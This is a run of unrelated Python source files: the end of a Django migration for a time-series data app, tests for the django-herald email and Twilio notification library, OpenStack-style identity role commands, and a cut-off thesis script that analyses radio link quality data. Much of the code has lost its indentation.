'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'parents'", 'to': u"orm['ddsc_core.LogicalGroup']"})
},
u'ddsc_core.manufacturer': {
'Meta': {'object_name': 'Manufacturer'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'})
},
u'ddsc_core.measuringdevice': {
'Meta': {'ordering': "[u'description']", 'object_name': 'MeasuringDevice'},
'begin_date': ('django.db.models.fields.DateField', [], {}),
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '12'}),
'description': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '60'}),
'end_date': ('django.db.models.fields.DateField', [], {}),
'group': ('django.db.models.fields.CharField', [], {'max_length': '60', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'ddsc_core.measuringmethod': {
'Meta': {'ordering': "[u'description']", 'object_name': 'MeasuringMethod'},
'begin_date': ('django.db.models.fields.DateField', [], {}),
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '12'}),
'description': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '60'}),
'end_date': ('django.db.models.fields.DateField', [], {}),
'group': ('django.db.models.fields.CharField', [], {'max_length': '60', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'titel': ('django.db.models.fields.CharField', [], {'max_length': '600', 'null': 'True'})
},
u'ddsc_core.parameter': {
'Meta': {'ordering': "[u'description']", 'object_name': 'Parameter'},
'begin_date': ('django.db.models.fields.DateField', [], {}),
'cas_number': ('django.db.models.fields.CharField', [], {'max_length': '12'}),
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '12'}),
'description': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '60'}),
'end_date': ('django.db.models.fields.DateField', [], {}),
'group': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sikb_id': ('django.db.models.fields.IntegerField', [], {'unique': 'True', 'null': 'True'})
},
u'ddsc_core.processingmethod': {
'Meta': {'ordering': "[u'description']", 'object_name': 'ProcessingMethod'},
'begin_date': ('django.db.models.fields.DateField', [], {}),
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '12'}),
'description': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '60'}),
'end_date': ('django.db.models.fields.DateField', [], {}),
'group': ('django.db.models.fields.CharField', [], {'max_length': '60', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'ddsc_core.referenceframe': {
'Meta': {'ordering': "[u'description']", 'object_name': 'ReferenceFrame'},
'begin_date': ('django.db.models.fields.DateField', [], {}),
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '12'}),
'description': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '60'}),
'end_date': ('django.db.models.fields.DateField', [], {}),
'group': ('django.db.models.fields.CharField', [], {'max_length': '60', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'ddsc_core.source': {
'Meta': {'unique_together': "((u'manufacturer', u'name'),)", 'object_name': 'Source'},
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'manufacturer': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['ddsc_core.Manufacturer']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'source_type': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'})
},
u'ddsc_core.timeseries': {
'Meta': {'object_name': 'Timeseries'},
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'compartment': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['ddsc_core.Compartment']", 'null': 'True', 'blank': 'True'}),
'data_set': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'timeseries'", 'symmetrical': 'False', 'to': "orm['lizard_security.DataSet']"}),
'description': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'first_value_timestamp': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'latest_value_number': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'latest_value_text': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'latest_value_timestamp': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'location': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'timeseries'", 'null': 'True', 'to': u"orm['ddsc_core.Location']"}),
'measuring_device': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['ddsc_core.MeasuringDevice']", 'null': 'True', 'blank': 'True'}),
'measuring_method': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['ddsc_core.MeasuringMethod']", 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_security.DataOwner']"}),
'parameter': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['ddsc_core.Parameter']"}),
'processing_method': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['ddsc_core.ProcessingMethod']", 'null': 'True', 'blank': 'True'}),
'reference_frame': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['ddsc_core.ReferenceFrame']", 'null': 'True', 'blank': 'True'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['ddsc_core.Source']"}),
'supplying_systems': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'symmetrical': 'False', 'through': u"orm['ddsc_core.IdMapping']", 'blank': 'True'}),
'unit': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['ddsc_core.Unit']"}),
'value_type': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'})
},
u'ddsc_core.timeseriesgroup': {
'Meta': {'object_name': 'TimeseriesGroup'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'parameters': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['ddsc_core.Parameter']", 'symmetrical': 'False'}),
'sources': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['ddsc_core.Source']", 'symmetrical': 'False'})
},
u'ddsc_core.unit': {
'Meta': {'ordering': "[u'description']", 'object_name': 'Unit'},
'begin_date': ('django.db.models.fields.DateField', [], {}),
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '12'}),
'conversion_factor': ('django.db.models.fields.CharField', [], {'max_length': '12', 'null': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '60'}),
'dimension': ('django.db.models.fields.CharField', [], {'max_length': '12', 'null': 'True'}),
'end_date': ('django.db.models.fields.DateField', [], {}),
'group': ('django.db.models.fields.CharField', [], {'max_length': '60', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'lizard_security.dataowner': {
'Meta': {'ordering': "['name']", 'object_name': 'DataOwner'},
'data_managers': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'remarks': ('django.db.models.fields.TextField', [], {'blank': 'True'})
},
'lizard_security.dataset': {
'Meta': {'ordering': "['owner', 'name']", 'unique_together': "(('owner', 'name'),)", 'object_name': 'DataSet'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_security.DataOwner']", 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['ddsc_core']
|
|
from datetime import timedelta
import jsonpickle
from django.core import mail
from django.core.files import File
from django.core.mail import EmailMultiAlternatives
from django.template import TemplateDoesNotExist
from django.test import TestCase, override_settings
from django.utils import timezone
from herald.base import (EmailNotification, NotificationBase,
TwilioTextNotification)
from herald.models import SentNotification
from mock import patch
from .notifications import MyNotification, MyNotificationAttachmentOpen
try:
# twilio version 6
from twilio.rest.api.v2010.account import MessageList
except ImportError:
    # twilio version < 6
from twilio.rest.resources import Messages as MessageList
class BaseNotificationTests(TestCase):
def test_get_context_data(self):
self.assertDictEqual(
MyNotification().get_context_data(),
{'hello': 'world', 'base_url': 'http://example.com', 'subject': None}
)
def test_get_recipients(self):
self.assertRaises(NotImplementedError, NotificationBase().get_recipients)
def test_get_extra_data(self):
self.assertDictEqual(NotificationBase().get_extra_data(), {})
def test_get_sent_from(self):
self.assertRaises(NotImplementedError, NotificationBase().get_sent_from)
def test_get_subject(self):
self.assertIsNone(NotificationBase().get_subject())
def test_get_demo_args(self):
self.assertListEqual(NotificationBase.get_demo_args(), [])
def test_private_send(self):
self.assertRaises(NotImplementedError, NotificationBase()._send, [])
def test_get_attachments(self):
self.assertIsNone(NotificationBase().get_attachments())
def test_send(self):
with patch.object(MyNotification, 'resend') as mocked_resend:
MyNotification().send()
mocked_resend.assert_called_once()
obj = mocked_resend.call_args[0][0]
self.assertEqual(obj.recipients, 'test@test.com')
def test_send_no_text(self):
class DummyNotification(EmailNotification):
render_types = ['html']
to_emails = ['test@test.com']
with patch.object(DummyNotification, 'resend') as mocked_resend:
DummyNotification().send()
mocked_resend.assert_called_once()
obj = mocked_resend.call_args[0][0]
self.assertEqual(obj.recipients, 'test@test.com')
self.assertIsNone(obj.text_content)
def test_real_send(self):
MyNotification().send()
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].to, ['test@test.com'])
def test_real_send_attachments(self):
MyNotification().send()
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].attachments[0][1], 'Some Report Data')
def test_real_send_attachments_open(self):
MyNotificationAttachmentOpen().send()
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].attachments[0][0], 'tests/python.jpeg')
self.assertEqual(mail.outbox[0].attachments[1][0], 'tests/python.jpeg')
def test_render_no_type(self):
class DummyNotification(NotificationBase):
pass
with self.assertRaises(AssertionError):
DummyNotification().render('text', {})
def test_render_invalid_template(self):
class DummyNotification(NotificationBase):
render_types = ['text']
template_name = 'does_not_exist'
self.assertIsNone(DummyNotification().render('text', {}))
@override_settings(DEBUG=True)
def test_render_invalid_template_debug(self):
class DummyNotification(NotificationBase):
render_types = ['text']
template_name = 'does_not_exist'
with self.assertRaises(TemplateDoesNotExist):
DummyNotification().render('text', {})
def test_render_invalid(self):
class DummyNotification(NotificationBase):
render_types = ['text']
template_name = 'hello_world'
self.assertEqual(DummyNotification().render('text', {}), 'Hello World')
def test_resend_error(self):
notification = SentNotification()
with patch.object(NotificationBase, '_send') as mocked__send:
mocked__send.side_effect = Exception
result = NotificationBase.resend(notification)
self.assertFalse(result)
def test_resend_error_raise(self):
notification = SentNotification()
with patch.object(NotificationBase, '_send') as mocked__send:
mocked__send.side_effect = Exception
self.assertRaises(Exception, NotificationBase.resend, notification, raise_exception=True)
def test_resend(self):
notification = SentNotification()
with patch.object(NotificationBase, '_send') as mocked__send:
result = NotificationBase.resend(notification)
self.assertTrue(result)
def test_get_verbose_name(self):
class TestNotification(EmailNotification):
pass
self.assertEqual(TestNotification.get_verbose_name(), 'Test Notification')
class TestNotification2(EmailNotification):
verbose_name = 'A verbose name'
self.assertEqual(TestNotification2.get_verbose_name(), 'A verbose name')
def test_get_encoded_attachments_none(self):
class TestNotification(EmailNotification):
attachments = []
self.assertJSONEqual(TestNotification()._get_encoded_attachments(), [])
def test_get_encoded_attachments_basic(self):
class TestNotification(EmailNotification):
attachments = [('Report.txt', 'raw_data', 'text/plain')]
self.assertJSONEqual(
TestNotification()._get_encoded_attachments(),
[{'py/tuple': ['Report.txt', 'raw_data', 'text/plain']}]
)
def test_get_encoded_attachments_file(self):
class TestNotification(EmailNotification):
attachments = [File(open('tests/python.jpeg', 'rb'))]
attachments = jsonpickle.loads(TestNotification()._get_encoded_attachments())
self.assertEqual(attachments[0][0], 'tests/python.jpeg')
self.assertEqual(attachments[0][2], 'image/jpeg')
def test_delete_notifications_no_setting(self):
# create a test notification from a long time ago
SentNotification.objects.create(
recipients='test@test.com', date_sent=timezone.now() - timedelta(weeks=52),
notification_class='MyNotification'
)
# create a test notification from recently
SentNotification.objects.create(
recipients='test@test.com', date_sent=timezone.now() - timedelta(weeks=10),
notification_class='MyNotification'
)
MyNotification().send()
        # none of the three notifications was deleted because the retention setting is absent
self.assertEqual(SentNotification.objects.count(), 3)
@override_settings(HERALD_NOTIFICATION_RETENTION_TIME=timedelta(weeks=26))
def test_delete_notifications(self):
# create a test notification from a long time ago
n1 = SentNotification.objects.create(
recipients='test@test.com', date_sent=timezone.now() - timedelta(weeks=52),
notification_class='MyNotification'
)
# create a test notification from recently
n2 = SentNotification.objects.create(
recipients='test@test.com', date_sent=timezone.now() - timedelta(weeks=10),
notification_class='MyNotification'
)
MyNotification().send()
# the one from a year ago was deleted, but not the one from 10 weeks ago.
self.assertEqual(SentNotification.objects.count(), 2)
ids = SentNotification.objects.values_list('id', flat=True)
self.assertTrue(n2.id in ids)
self.assertFalse(n1.id in ids)
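    # The two tests above capture the retention contract: old records are purged
    # on send() only when the retention setting is present, e.g. (assumed settings
    # module, value taken from the override above):
    #
    #   from datetime import timedelta
    #   HERALD_NOTIFICATION_RETENTION_TIME = timedelta(weeks=26)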
class EmailNotificationTests(TestCase):
def test_get_recipients(self):
self.assertListEqual(MyNotification().get_recipients(), ['test@test.com'])
def test_get_sent_from(self):
class TestNotification(EmailNotification):
from_email = 'bob@example.com'
self.assertEqual(TestNotification().get_sent_from(), 'bob@example.com')
def test_get_sent_from_default(self):
class TestNotification(EmailNotification):
from_email = None
with override_settings(DEFAULT_FROM_EMAIL='default@example.com'):
self.assertEqual(TestNotification().get_sent_from(), 'default@example.com')
def test_get_subject(self):
class TestNotification(EmailNotification):
subject = 'test subject'
self.assertEqual(TestNotification().get_subject(), 'test subject')
def test_get_extra_data_none(self):
self.assertDictEqual(EmailNotification().get_extra_data(), {})
def test_get_extra_data(self):
class TestNotification(EmailNotification):
bcc = 'bcc@test.com'
cc = 'cc@test.com'
headers = {'HEADER': 'test'}
reply_to = 'reply_to@test.com'
self.assertDictEqual(TestNotification().get_extra_data(), {
'bcc': 'bcc@test.com',
'cc': 'cc@test.com',
'headers': {'HEADER': 'test'},
'reply_to': 'reply_to@test.com',
})
@override_settings(HERALD_HTML2TEXT_ENABLED=True)
def test_render_html2text(self):
class TestNotificationHTML2Text(EmailNotification):
template_name = 'hello_world_html2text'
output = TestNotificationHTML2Text().render(render_type='text', context={})
self.assertEqual(output, '# Hello World\n\n')
# Also test with DEBUG on so TemplateDoesNotExist is thrown
with override_settings(DEBUG=True):
output = TestNotificationHTML2Text().render(render_type='text', context={})
self.assertEqual(output, '# Hello World\n\n')
def test_send_html_content(self):
class TestNotification(EmailNotification):
subject = 'test subject'
with patch.object(EmailMultiAlternatives, 'attach_alternative') as mocked_attach_alternative:
TestNotification._send([], text_content='Text')
mocked_attach_alternative.assert_not_called()
with patch.object(EmailMultiAlternatives, 'attach_alternative') as mocked_attach_alternative:
TestNotification._send([], html_content='Text')
mocked_attach_alternative.assert_called_once_with('Text', 'text/html')
class TwilioNotificationTests(TestCase):
def test_get_recipients(self):
class TestNotification(TwilioTextNotification):
to_number = '1231231234'
self.assertListEqual(TestNotification().get_recipients(), ['1231231234'])
def test_get_sent_from(self):
class TestNotification(TwilioTextNotification):
from_number = '1231231234'
self.assertEqual(TestNotification().get_sent_from(), '1231231234')
def test_get_sent_from_default(self):
class TestNotification(TwilioTextNotification):
from_number = None
with override_settings(TWILIO_DEFAULT_FROM_NUMBER='1231231234'):
self.assertEqual(TestNotification().get_sent_from(), '1231231234')
def test_get_sent_from_default_error(self):
class TestNotification(TwilioTextNotification):
from_number = None
self.assertRaisesMessage(
Exception,
'TWILIO_DEFAULT_FROM_NUMBER setting is required for sending a TwilioTextNotification',
TestNotification().get_sent_from
)
@override_settings(
TWILIO_ACCOUNT_SID='sid',
TWILIO_AUTH_TOKEN='token'
)
def test_send(self):
class TestNotification(TwilioTextNotification):
from_number = '1231231234'
to_number = '1231231234'
template_name = 'hello_world'
with patch.object(MessageList, 'create') as mocked_create:
TestNotification().send()
mocked_create.assert_called_once_with(
body='Hello World',
to='1231231234',
from_='1231231234'
)
@override_settings(
TWILIO_ACCOUNT_SID='sid',
TWILIO_AUTH_TOKEN='token'
)
def test_sending_to_multiple_numbers(self):
class TestNotification(TwilioTextNotification):
from_number = '1231231234'
template_name = 'hello_world'
def get_recipients(self):
return ['1234567890', '0987654321']
with patch.object(MessageList, 'create') as mocked_create:
notification = TestNotification()
notification.send()
self.assertEqual(mocked_create.call_count, 2)
for recipient in notification.get_recipients():
mocked_create.assert_any_call(
body='Hello World',
to=recipient,
from_=notification.get_sent_from()
)
def test_send_no_settings(self):
class TestNotification(TwilioTextNotification):
from_number = '1231231234'
to_number = '1231231234'
template_name = 'hello_world'
with self.assertRaisesMessage(Exception, 'TWILIO_ACCOUNT_SID and TWILIO_AUTH_TOKEN settings are required for '
'sending a TwilioTextNotification'):
TestNotification().send(raise_exception=True)
|
|
# Copyright 2012-2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Identity v3 Role action implementations"""
import six
import sys
from keystoneauth1 import exceptions as ks_exc
from eclcli.common import command
from eclcli.common import utils
from eclcli.i18n import _ # noqa
from eclcli.identity import common
def _add_identity_and_resource_options_to_parser(parser):
domain_or_project = parser.add_mutually_exclusive_group()
domain_or_project.add_argument(
'--domain',
metavar='<domain>',
help='Include <domain> (name or ID)',
)
domain_or_project.add_argument(
'--project',
metavar='<project>',
help='Include <project> (name or ID)',
)
user_or_group = parser.add_mutually_exclusive_group()
user_or_group.add_argument(
'--user',
metavar='<user>',
help='Include <user> (name or ID)',
)
user_or_group.add_argument(
'--group',
metavar='<group>',
help='Include <group> (name or ID)',
)
common.add_group_domain_option_to_parser(parser)
common.add_project_domain_option_to_parser(parser)
common.add_user_domain_option_to_parser(parser)
common.add_inherited_option_to_parser(parser)
def _process_identity_and_resource_options(parsed_args,
identity_client_manager):
kwargs = {}
if parsed_args.user and parsed_args.domain:
kwargs['user'] = common.find_user(
identity_client_manager,
parsed_args.user,
parsed_args.user_domain,
).id
kwargs['domain'] = common.find_domain(
identity_client_manager,
parsed_args.domain,
).id
elif parsed_args.user and parsed_args.project:
kwargs['user'] = common.find_user(
identity_client_manager,
parsed_args.user,
parsed_args.user_domain,
).id
kwargs['project'] = common.find_project(
identity_client_manager,
parsed_args.project,
parsed_args.project_domain,
).id
elif parsed_args.group and parsed_args.domain:
kwargs['group'] = common.find_group(
identity_client_manager,
parsed_args.group,
parsed_args.group_domain,
).id
kwargs['domain'] = common.find_domain(
identity_client_manager,
parsed_args.domain,
).id
elif parsed_args.group and parsed_args.project:
kwargs['group'] = common.find_group(
identity_client_manager,
parsed_args.group,
parsed_args.group_domain,
).id
kwargs['project'] = common.find_project(
identity_client_manager,
parsed_args.project,
parsed_args.project_domain,
).id
kwargs['os_inherit_extension_inherited'] = parsed_args.inherited
return kwargs
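# For illustration (values hypothetical), `--user alice --project demo` resolves to:
#
#   {'user': '<alice-id>', 'project': '<demo-id>',
#    'os_inherit_extension_inherited': parsed_args.inherited}
#
# which is passed straight to roles.grant() / roles.revoke() below.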
class AddRole(command.Command):
"""Adds a role to a user or group on a domain or project"""
def get_parser(self, prog_name):
parser = super(AddRole, self).get_parser(prog_name)
parser.add_argument(
'role',
metavar='<role>',
help='Role to add to <user> (name or ID)',
)
_add_identity_and_resource_options_to_parser(parser)
return parser
def take_action(self, parsed_args):
identity_client = self.app.client_manager.identity
if (not parsed_args.user and not parsed_args.domain
and not parsed_args.group and not parsed_args.project):
return
role = utils.find_resource(
identity_client.roles,
parsed_args.role,
)
kwargs = _process_identity_and_resource_options(
parsed_args, self.app.client_manager.identity)
if not kwargs:
sys.stderr.write("Role not added, incorrect set of arguments "
"provided. See ecl --help for more "
"details\n")
return
identity_client.roles.grant(role.id, **kwargs)
class CreateRole(command.ShowOne):
"""Create new role"""
def get_parser(self, prog_name):
parser = super(CreateRole, self).get_parser(prog_name)
parser.add_argument(
'name',
metavar='<role-name>',
help='New role name',
)
parser.add_argument(
'--or-show',
action='store_true',
help=_('Return existing role'),
)
return parser
def take_action(self, parsed_args):
identity_client = self.app.client_manager.identity
try:
role = identity_client.roles.create(name=parsed_args.name)
except ks_exc.Conflict as e:
if parsed_args.or_show:
role = utils.find_resource(identity_client.roles,
parsed_args.name)
self.log.info('Returning existing role %s', role.name)
else:
raise e
role._info.pop('links')
return zip(*sorted(six.iteritems(role._info)))
class DeleteRole(command.Command):
"""Delete role(s)"""
def get_parser(self, prog_name):
parser = super(DeleteRole, self).get_parser(prog_name)
parser.add_argument(
'roles',
metavar='<role>',
nargs="+",
help='Role(s) to delete (name or ID)',
)
return parser
def take_action(self, parsed_args):
identity_client = self.app.client_manager.identity
for role in parsed_args.roles:
role_obj = utils.find_resource(
identity_client.roles,
role,
)
identity_client.roles.delete(role_obj.id)
class ListRole(command.Lister):
"""List roles"""
def get_parser(self, prog_name):
parser = super(ListRole, self).get_parser(prog_name)
_add_identity_and_resource_options_to_parser(parser)
return parser
def take_action(self, parsed_args):
identity_client = self.app.client_manager.identity
if parsed_args.user:
user = common.find_user(
identity_client,
parsed_args.user,
parsed_args.user_domain,
)
elif parsed_args.group:
group = common.find_group(
identity_client,
parsed_args.group,
parsed_args.group_domain,
)
if parsed_args.domain:
domain = common.find_domain(
identity_client,
parsed_args.domain,
)
elif parsed_args.project:
project = common.find_project(
identity_client,
parsed_args.project,
parsed_args.project_domain,
)
# no user or group specified, list all roles in the system
if not parsed_args.user and not parsed_args.group:
columns = ('ID', 'Name')
data = identity_client.roles.list()
elif parsed_args.user and parsed_args.domain:
columns = ('ID', 'Name', 'Domain', 'User')
data = identity_client.roles.list(
user=user,
domain=domain,
os_inherit_extension_inherited=parsed_args.inherited
)
for user_role in data:
user_role.user = user.name
user_role.domain = domain.name
elif parsed_args.user and parsed_args.project:
columns = ('ID', 'Name', 'Project', 'User')
data = identity_client.roles.list(
user=user,
project=project,
os_inherit_extension_inherited=parsed_args.inherited
)
for user_role in data:
user_role.user = user.name
user_role.project = project.name
elif parsed_args.user:
columns = ('ID', 'Name')
data = identity_client.roles.list(
user=user,
domain='default',
os_inherit_extension_inherited=parsed_args.inherited
)
elif parsed_args.group and parsed_args.domain:
columns = ('ID', 'Name', 'Domain', 'Group')
data = identity_client.roles.list(
group=group,
domain=domain,
os_inherit_extension_inherited=parsed_args.inherited
)
for group_role in data:
group_role.group = group.name
group_role.domain = domain.name
elif parsed_args.group and parsed_args.project:
columns = ('ID', 'Name', 'Project', 'Group')
data = identity_client.roles.list(
group=group,
project=project,
os_inherit_extension_inherited=parsed_args.inherited
)
for group_role in data:
group_role.group = group.name
group_role.project = project.name
else:
sys.stderr.write("Error: If a user or group is specified, either "
"--domain or --project must also be specified to "
"list role grants.\n")
return ([], [])
return (columns,
(utils.get_item_properties(
s, columns,
formatters={},
) for s in data))
class RemoveRole(command.Command):
"""Remove role from domain/project : user/group"""
def get_parser(self, prog_name):
parser = super(RemoveRole, self).get_parser(prog_name)
parser.add_argument(
'role',
metavar='<role>',
help='Role to remove (name or ID)',
)
_add_identity_and_resource_options_to_parser(parser)
return parser
def take_action(self, parsed_args):
identity_client = self.app.client_manager.identity
if (not parsed_args.user and not parsed_args.domain
and not parsed_args.group and not parsed_args.project):
sys.stderr.write("Incorrect set of arguments "
"provided. See ecl --help for more "
"details\n")
return
role = utils.find_resource(
identity_client.roles,
parsed_args.role,
)
kwargs = _process_identity_and_resource_options(
parsed_args, self.app.client_manager.identity)
if not kwargs:
sys.stderr.write("Role not removed, incorrect set of arguments"
"provided. See ecl --help for more details\n")
return
identity_client.roles.revoke(role.id, **kwargs)
class SetRole(command.Command):
"""Set role properties"""
def get_parser(self, prog_name):
parser = super(SetRole, self).get_parser(prog_name)
parser.add_argument(
'role',
metavar='<role>',
help='Role to modify (name or ID)',
)
parser.add_argument(
'--name',
metavar='<name>',
help='Set role name',
)
return parser
def take_action(self, parsed_args):
identity_client = self.app.client_manager.identity
if not parsed_args.name:
sys.stderr.write("Incorrect set of arguments "
"provided. See ecl --help for more "
"details\n")
return
role = utils.find_resource(
identity_client.roles,
parsed_args.role,
)
identity_client.roles.update(role.id, name=parsed_args.name)
class ShowRole(command.ShowOne):
"""Display role details"""
def get_parser(self, prog_name):
parser = super(ShowRole, self).get_parser(prog_name)
parser.add_argument(
'role',
metavar='<role>',
help='Role to display (name or ID)',
)
return parser
def take_action(self, parsed_args):
identity_client = self.app.client_manager.identity
role = utils.find_resource(
identity_client.roles,
parsed_args.role,
)
role._info.pop('links')
return zip(*sorted(six.iteritems(role._info)))
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2014, Niklas Hauser
# All rights reserved.
#
# The file is part of my bachelor thesis and is released under the 3-clause BSD
# license. See the file `LICENSE` for the full license governing this code.
# -----------------------------------------------------------------------------
import os
import pylab
import logging
import datetime
import matplotlib.pyplot as plt
import numpy as np
from matplotlib.patches import Rectangle
import scipy.stats as stats
import pandas as pd
import seaborn as sns
sns.set_style("whitegrid")
import json
import math
class Analyzer(object):
def __init__(self, link_file, selector, basename):
self.links = None
self.link_file = link_file
self.selector = selector
self.logger = logging.getLogger('LinkAnalyzer')
self.logger.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(name)s: %(message)s')
# console logging
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
ch.setFormatter(formatter)
self.logger.handlers = []
self.logger.addHandler(ch)
self.raw_file_name = "{}_{}_raw.txt".format(basename, "A-B" if self.selector == 0 else "B-A")
self.raw_dict = {}
if os.path.isfile(self.raw_file_name):
with open(self.raw_file_name, 'r') as raw_file:
try:
self.raw_dict = json.load(raw_file)
                except ValueError:
                    print "Error: raw file corrupted!"
ids = self._read_from_raw_file('ids')
        if ids is None:
print "Requiring array of property for key 'ids'"
self.links = self.link_file.get_links_for_selector(self.selector)
ids = {'A': self.link_file.id_a, 'B': self.link_file.id_b}
self._write_to_raw_file('ids', ids)
id_string = "{}-{}".format(ids['A'] if self.selector == 0 else ids['B'], ids['B'] if self.selector == 0 else ids['A'])
self.basename = "{}_{}".format(basename, id_string)
self.ranges = {'rssi': range(-100, -80),
'lqi': range(30, 110),
'power': range(0, 30),
'bit_errors': range(0, 60),
'byte_errors': range(0, 40),
'temperature': range(20, 90)}
def _write_to_raw_file(self, key, data):
nkey = key.lower().replace(" ", "_")
self.raw_dict[nkey] = data
with open(self.raw_file_name, 'w') as raw_file:
json.dump(self.raw_dict, raw_file)
def _read_from_raw_file(self, key):
nkey = key.lower().replace(" ", "_")
if nkey in self.raw_dict:
return self.raw_dict[nkey]
return None
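    # Together these two helpers form a simple JSON-backed cache: expensive scans
    # over self.links are computed once and memoized under a normalized key.
    # Illustrative pattern (as used by the methods below):
    #
    #   data = self._read_from_raw_file(key)
    #   if data is None:
    #       data = self.get_array_of_property(key)
    #       self._write_to_raw_file(key, data)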
def get_array_of_property(self, key):
nkey = key.lower().replace(" ", "_")
        if self.links is None:
print "Requiring array of property for key '{}'".format(key)
self.links = self.link_file.get_links_for_selector(self.selector)
results = []
for link in self.links:
for rx in link.rx:
if nkey in rx:
results.append(rx[nkey])
return results
def get_normed_histogram_for_key(self, key):
nkey = key.lower().replace(" ", "_")
data = self._read_from_raw_file(nkey)
        if data is None:
data = self.get_array_of_property(nkey.replace("hist_", ""))
self._write_to_raw_file(nkey, data)
if len(data) > 0:
return np.histogram(data, bins=sorted(list(set(data))), normed=True), set(data)
return None
def create_histogram_plot_for_key(self, key, color='r'):
nkey = key.lower().replace(" ", "_")
data = self._read_from_raw_file(nkey)
        if data is None:
data = self.get_array_of_property(nkey.replace("hist_", ""))
self._write_to_raw_file(nkey, data)
if len(data) > 0:
fig, ax = plt.subplots(1)
n, bins, patches = ax.hist(data, self.ranges[nkey.replace("hist_", "")], normed=True, histtype='stepfilled', rwidth=0.8)
pylab.setp(patches, facecolor=color, alpha=0.75)
ax.set_ylabel("Occurances")
ax.set_xlabel(key)
mean = np.mean(data)
std = np.std(data)
ax.axvline(mean, color='k', linewidth=1.75)
ax.axvline(mean - std, color='0.5', linewidth=1, linestyle="-")
ax.axvline(mean + std, color='0.5', linewidth=1, linestyle="-")
hist = self.get_normed_histogram_for_key(nkey)
return fig, ax, {'hist': hist[0], 'bins': hist[1]}
return None
def create_xor_plot(self):
max_length = 12 + 32*2 + 16
bits_array = self._read_from_raw_file('xor_bits_array')
        if bits_array is None:
xors = self.get_array_of_property('xor')
if len(xors) > 0:
